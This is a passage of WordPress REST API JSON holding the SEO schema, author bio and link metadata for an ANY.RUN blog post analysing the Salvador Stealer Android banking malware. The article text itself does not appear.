name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Achmad Adhikara\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg\",\"caption\":\"Achmad Adhikara\"},\"description\":\"Achmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below periscope depth. fnord.\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Salvador Stealer: Analysis of New Mobile Banking Malware","description":"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","twitter_misc":{"Written by":"Achmad Adhikara","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"},"author":{"name":"Achmad Adhikara","@id":"https:\/\/any.run\/"},"headline":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs","datePublished":"2025-04-01T10:50:42+00:00","dateModified":"2025-04-02T05:49:54+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"},"wordCount":2592,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","malware","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","name":"Salvador Stealer: Analysis of New Mobile Banking Malware","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2025-04-01T10:50:42+00:00","dateModified":"2025-04-02T05:49:54+00:00","description":"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Achmad Adhikara","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg","caption":"Achmad Adhikara"},"description":"Achmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below periscope depth. fnord.","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=12413"}],"version-history":[{"count":84,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413\/revisions"}],"predecessor-version":[{"id":12525,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413\/revisions\/12525"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/12493"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=12413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=12413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=12413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}